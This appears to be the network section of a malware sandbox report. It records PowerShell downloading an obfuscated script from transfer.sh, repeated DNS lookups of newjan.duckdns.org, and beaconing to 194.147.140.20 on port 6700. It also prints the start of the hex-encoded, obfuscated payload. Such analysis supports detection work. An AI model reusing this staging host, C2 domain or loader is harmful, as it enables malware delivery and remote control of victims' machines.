                        Sep 14, 2021 16:20:52.998699903 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:53.050688028 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:53.132431030 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:53.132735968 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:53.386637926 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:53.386828899 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:53.576884985 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:53.628961086 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:53.820738077 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:53.863449097 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:53.961931944 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:54.198875904 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:54.942922115 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:59.133718967 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:59.325309992 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:59.325608969 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:59.326514959 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:59.526731968 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:59.527653933 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:59.717514038 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:59.719614029 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:59.964416981 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:59.964571953 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:00.091341019 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:00.145143986 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:00.154706955 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:00.154975891 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:00.338265896 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:00.379517078 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:00.389689922 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:00.389909029 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:00.579957962 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:00.629564047 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:00.819314003 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:00.863980055 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:00.943263054 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:01.193519115 CEST670049826194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:01.989809036 CEST498266700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:06.061882019 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:06.251665115 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:06.251885891 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:06.252588034 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:06.455614090 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:06.456298113 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:06.648456097 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:06.649708033 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:06.903290033 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:07.006342888 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:07.046771049 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:07.098798990 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:07.195909977 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:07.196171999 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:07.301054955 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:07.348686934 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:07.434575081 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:07.434652090 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:07.624557018 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:07.676846981 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:07.866564035 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:07.911386967 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:08.037476063 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:08.278413057 CEST670049827194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:09.038045883 CEST498276700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:13.112606049 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:13.407918930 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:13.408262968 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:13.410303116 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:13.615221977 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:13.616892099 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:13.807027102 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:13.807876110 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:14.044570923 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:14.155989885 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:14.156805992 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:14.346693993 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:14.348648071 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:14.538624048 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:14.539057970 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:14.729974031 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:14.772643089 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:14.962388992 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:15.005971909 CEST498286700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:21:18.608969927 CEST670049828194.147.140.20192.168.2.5
                        Sep 14, 2021 16:21:18.662245035 CEST498286700192.168.2.5194.147.140.20

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 14, 2021 16:17:03.318661928 CEST4955753192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:03.361287117 CEST53495578.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:05.042560101 CEST6173353192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:05.069099903 CEST53617338.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:05.562674999 CEST6544753192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:05.589551926 CEST53654478.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:06.319510937 CEST5244153192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:06.346596003 CEST53524418.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:08.851809978 CEST6217653192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:08.878002882 CEST53621768.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:09.422980070 CEST5959653192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:09.451282978 CEST53595968.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:10.071310997 CEST6529653192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:10.103617907 CEST53652968.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:10.979289055 CEST6318353192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:11.010293007 CEST53631838.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:12.493088961 CEST6015153192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:12.590192080 CEST53601518.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:13.387815952 CEST5696953192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:13.414266109 CEST53569698.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:18.745440960 CEST5516153192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:18.787339926 CEST53551618.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:23.549844027 CEST5475753192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:23.587608099 CEST53547578.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:35.991533041 CEST4999253192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:36.029963017 CEST53499928.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:55.805450916 CEST6007553192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:55.837105036 CEST53600758.8.8.8192.168.2.5
                        Sep 14, 2021 16:17:56.460510969 CEST5501653192.168.2.58.8.8.8
                        Sep 14, 2021 16:17:56.493191957 CEST53550168.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:01.858266115 CEST6434553192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:01.902832031 CEST53643458.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:14.754189014 CEST5712853192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:14.791747093 CEST53571288.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:21.754807949 CEST5479153192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:21.782069921 CEST53547918.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:27.811907053 CEST5046353192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:27.933105946 CEST53504638.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:35.845288038 CEST5039453192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:35.970140934 CEST53503948.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:43.197304964 CEST5853053192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:43.322990894 CEST53585308.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:50.172285080 CEST5381353192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:50.199570894 CEST53538138.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:51.465843916 CEST6373253192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:51.501975060 CEST53637328.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:54.136109114 CEST5734453192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:54.176279068 CEST53573448.8.8.8192.168.2.5
                        Sep 14, 2021 16:18:57.219764948 CEST5445053192.168.2.58.8.8.8
                        Sep 14, 2021 16:18:57.341713905 CEST53544508.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:04.334778070 CEST5926153192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:04.457339048 CEST53592618.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:11.415560007 CEST5715153192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:11.442842007 CEST53571518.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:18.449129105 CEST5941353192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:18.477673054 CEST53594138.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:25.517069101 CEST6051653192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:25.641248941 CEST53605168.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:32.809710026 CEST5164953192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:32.929860115 CEST53516498.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:39.802882910 CEST6508653192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:39.829579115 CEST53650868.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:40.571952105 CEST5643253192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:40.599816084 CEST53564328.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:41.231857061 CEST5292953192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:41.261955023 CEST53529298.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:41.688184023 CEST6431753192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:41.719609976 CEST53643178.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:42.301409006 CEST6100453192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:42.325932980 CEST53610048.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:42.697916031 CEST5689553192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:42.729331017 CEST53568958.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:43.231796980 CEST6237253192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:43.261132002 CEST53623728.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:43.812561035 CEST6151553192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:43.840065002 CEST53615158.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:44.857552052 CEST5667553192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:44.895551920 CEST53566758.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:45.781491995 CEST5717253192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:45.812344074 CEST53571728.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:46.263962984 CEST5526753192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:46.297770977 CEST53552678.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:48.545818090 CEST5096953192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:48.575927973 CEST53509698.8.8.8192.168.2.5
                        Sep 14, 2021 16:19:56.292320967 CEST6436253192.168.2.58.8.8.8
                        Sep 14, 2021 16:19:56.417550087 CEST53643628.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:03.109637976 CEST5476653192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:03.145425081 CEST53547668.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:09.963685036 CEST6144653192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:09.988833904 CEST53614468.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:16.640316963 CEST5751553192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:16.672033072 CEST53575158.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:23.709075928 CEST5819953192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:23.831912041 CEST53581998.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:30.841327906 CEST6522153192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:30.963836908 CEST53652218.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:38.004478931 CEST6157353192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:38.033927917 CEST53615738.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:45.021821976 CEST5656253192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:45.151995897 CEST53565628.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:52.004549980 CEST5359153192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:52.037105083 CEST53535918.8.8.8192.168.2.5
                        Sep 14, 2021 16:20:58.997158051 CEST5968853192.168.2.58.8.8.8
                        Sep 14, 2021 16:20:59.130908012 CEST53596888.8.8.8192.168.2.5
                        Sep 14, 2021 16:21:06.033632994 CEST5603253192.168.2.58.8.8.8
                        Sep 14, 2021 16:21:06.059653044 CEST53560328.8.8.8192.168.2.5
                        Sep 14, 2021 16:21:13.081610918 CEST6115053192.168.2.58.8.8.8
                        Sep 14, 2021 16:21:13.107392073 CEST53611508.8.8.8192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Sep 14, 2021 16:17:23.549844027 CEST192.168.2.58.8.8.80xba2eStandard query (0)transfer.shA (IP address)IN (0x0001)
                        Sep 14, 2021 16:17:55.805450916 CEST192.168.2.58.8.8.80x455fStandard query (0)transfer.shA (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:27.811907053 CEST192.168.2.58.8.8.80xda87Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:35.845288038 CEST192.168.2.58.8.8.80x7ff7Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:43.197304964 CEST192.168.2.58.8.8.80x8176Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:50.172285080 CEST192.168.2.58.8.8.80xf9c5Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:57.219764948 CEST192.168.2.58.8.8.80x2546Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:04.334778070 CEST192.168.2.58.8.8.80xf6b7Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:11.415560007 CEST192.168.2.58.8.8.80xc784Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:18.449129105 CEST192.168.2.58.8.8.80x9a62Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:25.517069101 CEST192.168.2.58.8.8.80x2ab1Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:32.809710026 CEST192.168.2.58.8.8.80x9c8bStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:42.301409006 CEST192.168.2.58.8.8.80x2225Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:48.545818090 CEST192.168.2.58.8.8.80x2c6cStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:56.292320967 CEST192.168.2.58.8.8.80x15fStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:03.109637976 CEST192.168.2.58.8.8.80x813bStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:09.963685036 CEST192.168.2.58.8.8.80xd485Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:16.640316963 CEST192.168.2.58.8.8.80xa44fStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:23.709075928 CEST192.168.2.58.8.8.80xf4caStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:30.841327906 CEST192.168.2.58.8.8.80x4a3eStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:38.004478931 CEST192.168.2.58.8.8.80xc8deStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:45.021821976 CEST192.168.2.58.8.8.80x848Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:52.004549980 CEST192.168.2.58.8.8.80x85feStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:58.997158051 CEST192.168.2.58.8.8.80xeea3Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:21:06.033632994 CEST192.168.2.58.8.8.80x6de8Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                        Sep 14, 2021 16:21:13.081610918 CEST192.168.2.58.8.8.80x7df4Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Sep 14, 2021 16:17:23.587608099 CEST8.8.8.8192.168.2.50xba2eNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                        Sep 14, 2021 16:17:55.837105036 CEST8.8.8.8192.168.2.50x455fNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:27.933105946 CEST8.8.8.8192.168.2.50xda87No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:35.970140934 CEST8.8.8.8192.168.2.50x7ff7No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:43.322990894 CEST8.8.8.8192.168.2.50x8176No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:50.199570894 CEST8.8.8.8192.168.2.50xf9c5No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:18:57.341713905 CEST8.8.8.8192.168.2.50x2546No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:04.457339048 CEST8.8.8.8192.168.2.50xf6b7No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:11.442842007 CEST8.8.8.8192.168.2.50xc784No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:18.477673054 CEST8.8.8.8192.168.2.50x9a62No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:25.641248941 CEST8.8.8.8192.168.2.50x2ab1No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:32.929860115 CEST8.8.8.8192.168.2.50x9c8bNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:42.325932980 CEST8.8.8.8192.168.2.50x2225No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:48.575927973 CEST8.8.8.8192.168.2.50x2c6cNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:19:56.417550087 CEST8.8.8.8192.168.2.50x15fNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:03.145425081 CEST8.8.8.8192.168.2.50x813bNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:09.988833904 CEST8.8.8.8192.168.2.50xd485No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:16.672033072 CEST8.8.8.8192.168.2.50xa44fNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:23.831912041 CEST8.8.8.8192.168.2.50xf4caNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:30.963836908 CEST8.8.8.8192.168.2.50x4a3eNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:38.033927917 CEST8.8.8.8192.168.2.50xc8deNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:45.151995897 CEST8.8.8.8192.168.2.50x848No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:52.037105083 CEST8.8.8.8192.168.2.50x85feNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:20:59.130908012 CEST8.8.8.8192.168.2.50xeea3No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:21:06.059653044 CEST8.8.8.8192.168.2.50x6de8No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                        Sep 14, 2021 16:21:13.107392073 CEST8.8.8.8192.168.2.50x7df4No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • transfer.sh

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.549753144.76.136.153443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampkBytes transferredDirectionData
                        2021-09-14 14:17:23 UTC0OUTGET /PeIb5p/ffrtg.txt HTTP/1.1
                        Host: transfer.sh
                        Connection: Keep-Alive
                        2021-09-14 14:17:24 UTC0INHTTP/1.1 200 OK
                        Content-Disposition: attachment; filename="ffrtg.txt"
                        Content-Length: 10839
                        Content-Type: text/plain; charset=utf-8
                        Retry-After: Tue, 14 Sep 2021 16:17:29 GMT
                        Server: Transfer.sh HTTP Server 1.0
                        X-Made-With: <3 by DutchCoders
                        X-Ratelimit-Key: 84.17.52.51
                        X-Ratelimit-Limit: 10
                        X-Ratelimit-Rate: 600
                        X-Ratelimit-Remaining: 9
                        X-Ratelimit-Reset: 1631629049
                        X-Remaining-Days: n/a
                        X-Remaining-Downloads: n/a
                        X-Served-By: Proudly served by DutchCoders
                        Date: Tue, 14 Sep 2021 14:17:24 GMT
                        Connection: close
                        2021-09-14 14:17:24 UTC0INData Raw: 24 61 61 20 3d 20 22 32 34 3a 2d 3a 34 36 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 33 61 3a 2d 3a 35 63 3a 2d 3a 35 35 3a 2d 3a 37 33 3a 2d 3a 35 34 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 35 3a 2d 3a 34 33 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 34 3a 2d 3a 34 33 3a 2d 3a 35 32 3a
                        Data Ascii: $aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:
                        2021-09-14 14:17:24 UTC1INData Raw: 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 37 32 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 36 66 3a 2d 3a 37 32 3a 2d 3a 37 39 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a 36 35 3a 2d 3a 37 30 3a 2d 3a 36 63 3a 2d 3a 36 31 3a 2d 3a 36 33 3a 2d 3a 36 35 3a 2d 3a 32 38 3a 2d 3a 32 32 3a 2d
                        Data Ascii: :47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-
